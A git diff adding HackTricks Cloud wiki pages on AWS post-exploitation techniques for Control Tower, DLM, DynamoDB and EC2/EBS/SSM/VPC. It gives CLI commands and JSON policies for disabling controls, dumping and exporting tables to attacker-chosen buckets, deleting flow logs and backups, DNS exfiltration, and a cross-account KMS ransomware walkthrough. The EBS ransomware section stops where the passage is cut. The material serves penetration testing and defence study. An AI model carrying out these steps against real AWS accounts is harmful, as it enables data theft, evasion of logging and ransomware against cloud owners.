+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md new file mode 100644 index 0000000000..1fa4d4d499 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md @@ -0,0 +1,48 @@ +# AWS - Control Tower Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Control Tower + +{% content-ref url="../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md" %} +[aws-control-tower-enum.md](../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md) +{% endcontent-ref %} + +### Enable / Disable Controls + +To further exploit an account, you might need to disable/enable Control Tower controls: + +{% code overflow="wrap" %} +```bash +aws controltower disable-control --control-identifier --target-identifier +aws controltower enable-control --control-identifier --target-identifier +``` +{% endcode %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md new file mode 100644 index 0000000000..0160899e90 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md @@ -0,0 +1,121 @@ +# AWS - DLM Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Data Lifecycle Manger (DLM) + +### `EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy` + +A ransomware attack can be executed by encrypting as many EBS volumes as possible and then erasing the current EC2 instances, EBS volumes, and snapshots. To automate this malicious activity, one can employ Amazon DLM, encrypting the snapshots with a KMS key from another AWS account and transferring the encrypted snapshots to a different account. Alternatively, they might transfer snapshots without encryption to an account they manage and then encrypt them there. Although it's not straightforward to encrypt existing EBS volumes or snapshots directly, it's possible to do so by creating a new volume or snapshot. + +Firstly, one will use a command to gather information on volumes, such as instance ID, volume ID, encryption status, attachment status, and volume type. + +`aws ec2 describe-volumes` + +Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs. 
+ +```bash +aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json +``` + +A template for the policy document can be seen here: + +```bash +{ + "PolicyType": "EBS_SNAPSHOT_MANAGEMENT", + "ResourceTypes": [ + "VOLUME" + ], + "TargetTags": [ + { + "Key": "ExampleKey", + "Value": "ExampleValue" + } + ], + "Schedules": [ + { + "Name": "DailySnapshots", + "CopyTags": true, + "TagsToAdd": [ + { + "Key": "SnapshotCreator", + "Value": "DLM" + } + ], + "VariableTags": [ + { + "Key": "CostCenter", + "Value": "Finance" + } + ], + "CreateRule": { + "Interval": 24, + "IntervalUnit": "HOURS", + "Times": [ + "03:00" + ] + }, + "RetainRule": { + "Count": 14 + }, + "FastRestoreRule": { + "Count": 2, + "Interval": 12, + "IntervalUnit": "HOURS" + }, + "CrossRegionCopyRules": [ + { + "TargetRegion": "us-west-2", + "Encrypted": true, + "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id", + "CopyTags": true, + "RetainRule": { + "Interval": 1, + "IntervalUnit": "DAYS" + } + } + ], + "ShareRules": [ + { + "TargetAccounts": [ + "123456789012" + ], + "UnshareInterval": 30, + "UnshareIntervalUnit": "DAYS" + } + ] + } + ], + "Parameters": { + "ExcludeBootVolume": false + } +} +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md new file mode 100644 index 0000000000..a431beae51 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md @@ -0,0 +1,372 @@ +# AWS - DynamoDB Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## DynamoDB + +For more information check: + +{% content-ref url="../aws-services/aws-dynamodb-enum.md" %} +[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md) +{% endcontent-ref %} + +### `dynamodb:BatchGetItem` + +An attacker with this permissions will be able to **get items from tables by the primary key** (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (`describe-table`). + +{% tabs %} +{% tab title="json file" %} +{% code overflow="wrap" %} +```bash +aws dynamodb batch-get-item --request-items file:///tmp/a.json + +// With a.json +{ + "ProductCatalog" : { // This is the table name + "Keys": [ + { + "Id" : { // Primary keys name + "N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those + } + } + ] + } +} +``` +{% endcode %} +{% endtab %} + +{% tab title="inline" %} +{% code overflow="wrap" %} +```bash +aws dynamodb batch-get-item \ + --request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \ + --region +``` +{% endcode %} +{% endtab %} +{% endtabs %} + +**Potential Impact:** Indirect privesc by locating sensitive information in the table + +### `dynamodb:GetItem` + +**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve: + +{% code overflow="wrap" %} +```json +aws dynamodb get-item --table-name ProductCatalog --key file:///tmp/a.json + +// With a.json +{ +"Id" : { + "N": "205" +} +} +``` +{% endcode %} + +With this permission it's also possible to use the **`transact-get-items`** method like: + +```json +aws dynamodb transact-get-items \ + --transact-items file:///tmp/a.json + +// With a.json +[ + { + "Get": { + "Key": { + "Id": {"N": "205"} + }, + "TableName": "ProductCatalog" + } + } +] +``` + +**Potential Impact:** Indirect privesc by locating sensitive 
information in the table + +### `dynamodb:Query` + +**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request. + +{% tabs %} +{% tab title="json file" %} +{% code overflow="wrap" %} +```bash +aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json + + // With a.json + { +"Id" : { + "ComparisonOperator":"EQ", + "AttributeValueList": [ {"N": "205"} ] + } +} +``` +{% endcode %} +{% endtab %} + +{% tab title="inline" %} +```bash +aws dynamodb query \ + --table-name TargetTable \ + --key-condition-expression "AttributeName = :value" \ + --expression-attribute-values '{":value":{"S":"TargetValue"}}' \ + --region +``` +{% endtab %} +{% endtabs %} + +**Potential Impact:** Indirect privesc by locating sensitive information in the table + +### `dynamodb:Scan` + +You can use this permission to **dump the entire table easily**. + +```bash +aws dynamodb scan --table-name #Get data inside the table +``` + +**Potential Impact:** Indirect privesc by locating sensitive information in the table + +### `dynamodb:PartiQLSelect` + +You can use this permission to **dump the entire table easily**. + +```bash +aws dynamodb execute-statement \ + --statement "SELECT * FROM ProductCatalog" +``` + +This permission also allow to perform `batch-execute-statement` like: + +```bash +aws dynamodb batch-execute-statement \ + --statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]' +``` + +but you need to specify the primary key with a value, so it isn't that useful. 
+ +**Potential Impact:** Indirect privesc by locating sensitive information in the table + +### `dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)` + +This permission will allow an attacker to **export the whole table to a S3 bucket** of his election: + +```bash +aws dynamodb export-table-to-point-in-time \ + --table-arn arn:aws:dynamodb:::table/TargetTable \ + --s3-bucket \ + --s3-prefix \ + --export-time \ + --region +``` + +Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with: + +```bash +aws dynamodb describe-continuous-backups \ + --table-name +``` + +If it isn't enabled, you will need to **enable it** and for that you need the **`dynamodb:ExportTableToPointInTime`** permission: + +```bash +aws dynamodb update-continuous-backups \ + --table-name \ + --point-in-time-recovery-specification PointInTimeRecoveryEnabled=true +``` + +**Potential Impact:** Indirect privesc by locating sensitive information in the table + +### `dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)` + +With these permissions, an attacker would be able to **create a new table from a backup** (or even create a backup to then restore it in a different table). Then, with the necessary permissions, he would be able to check **information** from the backups that c**ould not be any more in the production** table. + +```bash +aws dynamodb restore-table-from-backup \ + --backup-arn \ + --target-table-name \ + --region +``` + +**Potential Impact:** Indirect privesc by locating sensitive information in the table backup + +### `dynamodb:PutItem` + +This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**. 
+ +{% tabs %} +{% tab title="XSS Example" %} +{% code overflow="wrap" %} +```bash +## Create new item with XSS payload +aws dynamodb put-item --table --item file://add.json +### With add.json: +{ + "Id": { + "S": "1000" + }, + "Name": { + "S": "Marc" + }, + "Description": { + "S": "" + } +} +``` +{% endcode %} +{% endtab %} + +{% tab title="AI Example" %} +```bash +aws dynamodb put-item \ + --table-name ExampleTable \ + --item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \ + --region +``` +{% endtab %} +{% endtabs %} + +**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table + +### `dynamodb:UpdateItem` + +This permission allows users to **modify the existing attributes of an item or add new attributes to an item**. It does **not replace** the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will **create a new item** with the specified primary key and set the attributes specified in the update expression. 
+ +{% tabs %} +{% tab title="XSS Example" %} +{% code overflow="wrap" %} +```bash +## Update item with XSS payload +aws dynamodb update-item --table \ + --key file://key.json --update-expression "SET Description = :value" \ + --expression-attribute-values file://val.json +### With key.json: +{ + "Id": { + "S": "1000" + } +} +### and val.json +{ + ":value": { + "S": "" + } +} +``` +{% endcode %} +{% endtab %} + +{% tab title="AI Example" %} +```bash +aws dynamodb update-item \ + --table-name ExampleTable \ + --key '{"Id": {"S": "1"}}' \ + --update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \ + --expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \ + --region +``` +{% endtab %} +{% endtabs %} + +**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table + +### `dynamodb:DeleteTable` + +An attacker with this permission can **delete a DynamoDB table, causing data loss**. + +```bash +aws dynamodb delete-table \ + --table-name TargetTable \ + --region +``` + +**Potential impact**: Data loss and disruption of services relying on the deleted table. + +### `dynamodb:DeleteBackup` + +An attacker with this permission can **delete a DynamoDB backup, potentially causing data loss in case of a disaster recovery scenario**. + +```bash +aws dynamodb delete-backup \ + --backup-arn arn:aws:dynamodb:::table/TargetTable/backup/BACKUP_ID \ + --region +``` + +**Potential impact**: Data loss and inability to recover from a backup during a disaster recovery scenario. 
+ +### `dynamodb:StreamSpecification`, `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords` + +{% hint style="info" %} +TODO: Test if this actually works +{% endhint %} + +An attacker with these permissions can **enable a stream on a DynamoDB table, update the table to begin streaming changes, and then access the stream to monitor changes to the table in real-time**. This allows the attacker to monitor and exfiltrate data changes, potentially leading to data leakage. + +1. Enable a stream on a DynamoDB table: + +```bash +bashCopy codeaws dynamodb update-table \ + --table-name TargetTable \ + --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \ + --region +``` + +2. Describe the stream to obtain the ARN and other details: + +```bash +bashCopy codeaws dynamodb describe-stream \ + --table-name TargetTable \ + --region +``` + +3. Get the shard iterator using the stream ARN: + +```bash +bashCopy codeaws dynamodbstreams get-shard-iterator \ + --stream-arn \ + --shard-id \ + --shard-iterator-type LATEST \ + --region +``` + +4. Use the shard iterator to access and exfiltrate data from the stream: + +```bash +bashCopy codeaws dynamodbstreams get-records \ + --shard-iterator \ + --region +``` + +**Potential impact**: Real-time monitoring and data leakage of the DynamoDB table's changes. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md new file mode 100644 index 0000000000..4000b19caf --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md @@ -0,0 +1,511 @@ +# AWS - EC2, EBS, SSM & VPC Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## EC2 & VPC + +For more information check: + +{% content-ref url="../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} +[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) +{% endcontent-ref %} + +### **Malicious VPC Mirror -** `ec2:DescribeInstances`, `ec2:RunInstances`, `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress`, `ec2:CreateTrafficMirrorTarget`, `ec2:CreateTrafficMirrorSession`, `ec2:CreateTrafficMirrorFilter`, `ec2:CreateTrafficMirrorFilterRule` + +VPC traffic mirroring **duplicates inbound and outbound traffic for EC2 instances within a VPC** without the need to install anything on the instances themselves. This duplicated traffic would commonly be sent to something like a network intrusion detection system (IDS) for analysis and monitoring.\ +An attacker could abuse this to capture all the traffic and obtain sensitive information from it: + +For more information check this page: + +{% content-ref url="aws-malicious-vpc-mirror.md" %} +[aws-malicious-vpc-mirror.md](aws-malicious-vpc-mirror.md) +{% endcontent-ref %} + +### Copy Running Instance + +Instances usually contain some kind of sensitive information. There are different ways to get inside (check [EC2 privilege escalation tricks](../../aws-privilege-escalation/aws-ec2-privesc.md)). However, another way to check what it contains is to **create an AMI and run a new instance (even in your own account) from it**: + +```shell +# List instances +aws ec2 describe-images + +# create a new image for the instance-id +aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1 + +# add key to AWS +aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1 + +# create ec2 using the previously created AMI, use the same security group and subnet to connect easily. 
+aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1 + +# now you can check the instance +aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 + +# If needed : edit groups +aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1 + +# be a good guy, clean our instance to avoid any useless cost +aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 +aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 +``` + +### EBS Snapshot dump + +**Snapshots are backups of volumes**, which usually will contain **sensitive information**, therefore checking them should disclose this information.\ +If you find a **volume without a snapshot** you could: **Create a snapshot** and perform the following actions or just **mount it in an instance** inside the account: + +{% content-ref url="aws-ebs-snapshot-dump.md" %} +[aws-ebs-snapshot-dump.md](aws-ebs-snapshot-dump.md) +{% endcontent-ref %} + +### Data Exfiltration + +#### DNS Exfiltration + +Even if you lock down an EC2 so no traffic can get out, it can still **exfil via DNS**. + +* **VPC Flow Logs will not record this**. +* You have no access to AWS DNS logs. +* Disable this by setting "enableDnsSupport" to false with: + + `aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id ` + +#### Exfiltration via API calls + +An attacker could call API endpoints of an account controlled by him. Cloudtrail will log this calls and the attacker will be able to see the exfiltrate data in the Cloudtrail logs. 
+ +### Open Security Group + +You could get further access to network services by opening ports like this: + +{% code overflow="wrap" %} +```bash +aws ec2 authorize-security-group-ingress --group-id --protocol tcp --port 80 --cidr 0.0.0.0/0 +# Or you could just open it to more specific ips or maybe th einternal network if you have already compromised an EC2 in the VPC +``` +{% endcode %} + +### Privesc to ECS + +It's possible to run an EC2 instance an register it to be used to run ECS instances and then steal the ECS instances data. + +For [**more information check this**](../../aws-privilege-escalation/aws-ec2-privesc.md#privesc-to-ecs). + +### Remove VPC flow logs + +```bash +aws ec2 delete-flow-logs --flow-log-ids --region +``` + +### SSM Port Forwarding + +Required permissions: +- `ssm:StartSession` + +In addition to command execution, SSM allows for traffic tunneling which can be abused to pivot from EC2 instances that do not have network access because of Security Groups or NACLs. +One of the scenarios where this is useful is pivoting from a [Bastion Host](https://www.geeksforgeeks.org/what-is-aws-bastion-host/) to a private EKS cluster. + +> In order to start a session you need the SessionManagerPlugin installed: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html + +1. Install the SessionManagerPlugin on your machine +2. Log in to the Bastion EC2 using the following command: + +```shell +aws ssm start-session --target "$INSTANCE_ID" +``` + +3. Get the Bastion EC2 AWS temporary credentials with the [Abusing SSRF in AWS EC2 environment](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#abusing-ssrf-in-aws-ec2-environment) script +4. Transfer the credentials to your own machine in the `$HOME/.aws/credentials` file as `[bastion-ec2]` profile +5. Log in to EKS as the Bastion EC2: + +```shell +aws eks update-kubeconfig --profile bastion-ec2 --region --name +``` + +6. 
Update the `server` field in `$HOME/.kube/config` file to point to `https://localhost` +7. Create an SSM tunnel as follows: + +```shell +sudo aws ssm start-session --target $INSTANCE_ID --document-name AWS-StartPortForwardingSessionToRemoteHost --parameters '{"host":[""],"portNumber":["443"], "localPortNumber":["443"]}' --region +``` +8. The traffic from the `kubectl` tool is now forwarded throug the SSM tunnel via the Bastion EC2 and you can access the private EKS cluster from your own machine by running: +```shell +kubectl get pods --insecure-skip-tls-verify +``` + +Note that the SSL connections will fail unless you set the `--insecure-skip-tls-verify ` flag (or its equivalent in K8s audit tools). Seeing that the traffic is tunnelled through the secure AWS SSM tunnel, you are safe from any sort of MitM attacks. + +Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application. + + +### Share AMI + +{% code overflow="wrap" %} +```bash +aws ec2 modify-image-attribute --image-id --launch-permission "Add=[{UserId=}]" --region +``` +{% endcode %} + +### Search sensitive information in public and private AMIs + +* [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel is a tool designed to **search for sensitive information within public or private Amazon Machine Images (AMIs)**. It automates the process of launching instances from target AMIs, mounting their volumes, and scanning for potential secrets or sensitive data. + +### Share EBS Snapshot + +{% code overflow="wrap" %} +```bash +aws ec2 modify-snapshot-attribute --snapshot-id --create-volume-permission "Add=[{UserId=}]" --region +``` +{% endcode %} + +### EBS Ransomware PoC + +A proof of concept similar to the Ransomware demonstration demonstrated in the S3 post-exploitation notes. 
KMS should be renamed to RMS for Ransomware Management Service with how easy it is to use to encrypt various AWS services using it. + +First from an 'attacker' AWS account, create a customer managed key in KMS. For this example we'll just have AWS manage the key data for me, but in a realistic scenario a malicious actor would retain the key data outside of AWS' control. Change the key policy to allow for any AWS account Principal to use the key. For this key policy, the account's name was 'AttackSim' and the policy rule allowing all access is called 'Outside Encryption' + +``` +{ + "Version": "2012-10-17", + "Id": "key-consolepolicy-3", + "Statement": [ + { + "Sid": "Enable IAM User Permissions", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::[Your AWS Account Id]:root" + }, + "Action": "kms:*", + "Resource": "*" + }, + { + "Sid": "Allow access for Key Administrators", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" + }, + "Action": [ + "kms:Create*", + "kms:Describe*", + "kms:Enable*", + "kms:List*", + "kms:Put*", + "kms:Update*", + "kms:Revoke*", + "kms:Disable*", + "kms:Get*", + "kms:Delete*", + "kms:TagResource", + "kms:UntagResource", + "kms:ScheduleKeyDeletion", + "kms:CancelKeyDeletion" + ], + "Resource": "*" + }, + { + "Sid": "Allow use of the key", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" + }, + "Action": [ + "kms:Encrypt", + "kms:Decrypt", + "kms:ReEncrypt*", + "kms:GenerateDataKey*", + "kms:DescribeKey" + ], + "Resource": "*" + }, + { + "Sid": "Outside Encryption", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": [ + "kms:Encrypt", + "kms:Decrypt", + "kms:ReEncrypt*", + "kms:GenerateDataKey*", + "kms:DescribeKey", + "kms:GenerateDataKeyWithoutPlainText", + "kms:CreateGrant" + ], + "Resource": "*" + }, + { + "Sid": "Allow attachment of persistent resources", + "Effect": "Allow", + "Principal": { + "AWS": 
"arn:aws:iam::[Your AWS Account Id]:user/AttackSim" + }, + "Action": [ + "kms:CreateGrant", + "kms:ListGrants", + "kms:RevokeGrant" + ], + "Resource": "*", + "Condition": { + "Bool": { + "kms:GrantIsForAWSResource": "true" + } + } + } + ] +} +``` + +The key policy rule needs the following enabled to allow for the ability to use it to encrypt an EBS volume: + +* `kms:CreateGrant` +* `kms:Decrypt` +* `kms:DescribeKey` +* `kms:GenerateDataKeyWithoutPlainText` +* `kms:ReEncrypt` + +Now with the publicly accessible key to use. We can use a 'victim' account that has some EC2 instances spun up with unencrypted EBS volumes attached. This 'victim' account's EBS volumes are what we're targeting for encryption, this attack is under the assumed breach of a high-privilege AWS account. + +![Pasted image 20231231172655](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/5b9a96cd-6006-4965-84a4-b090456f90c6) ![Pasted image 20231231172734](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4294289c-0dbd-4eb6-a484-60b4e4266459) + +Similar to the S3 ransomware example. This attack will create copies of the attached EBS volumes using snapshots, use the publicly available key from the 'attacker' account to encrypt the new EBS volumes, then detach the original EBS volumes from the EC2 instances and delete them, and then finally delete the snapshots used to create the newly encrypted EBS volumes. ![Pasted image 20231231173130](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/34808990-2b3b-4975-a523-8ee45874279e) + +This results in only encrypted EBS volumes left available in the account. + +![Pasted image 20231231173338](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/eccdda58-f4b1-44ea-9719-43afef9a8220) + +Also worth noting, the script stopped the EC2 instances to detach and delete the original EBS volumes. The original unencrypted volumes are gone now. 
+ +![Pasted image 20231231173931](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/cc31a5c9-fbb4-4804-ac87-911191bb230e) + +Next, return to the key policy in the 'attacker' account and remove the 'Outside Encryption' policy rule from the key policy. + +```json +{ + "Version": "2012-10-17", + "Id": "key-consolepolicy-3", + "Statement": [ + { + "Sid": "Enable IAM User Permissions", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::[Your AWS Account Id]:root" + }, + "Action": "kms:*", + "Resource": "*" + }, + { + "Sid": "Allow access for Key Administrators", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" + }, + "Action": [ + "kms:Create*", + "kms:Describe*", + "kms:Enable*", + "kms:List*", + "kms:Put*", + "kms:Update*", + "kms:Revoke*", + "kms:Disable*", + "kms:Get*", + "kms:Delete*", + "kms:TagResource", + "kms:UntagResource", + "kms:ScheduleKeyDeletion", + "kms:CancelKeyDeletion" + ], + "Resource": "*" + }, + { + "Sid": "Allow use of the key", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" + }, + "Action": [ + "kms:Encrypt", + "kms:Decrypt", + "kms:ReEncrypt*", + "kms:GenerateDataKey*", + "kms:DescribeKey" + ], + "Resource": "*" + }, + { + "Sid": "Allow attachment of persistent resources", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" + }, + "Action": [ + "kms:CreateGrant", + "kms:ListGrants", + "kms:RevokeGrant" + ], + "Resource": "*", + "Condition": { + "Bool": { + "kms:GrantIsForAWSResource": "true" + } + } + } + ] +} +``` + +Wait a moment for the newly set key policy to propagate. Then return to the 'victim' account and attempt to attach one of the newly encrypted EBS volumes. You'll find that you can attach the volume. 
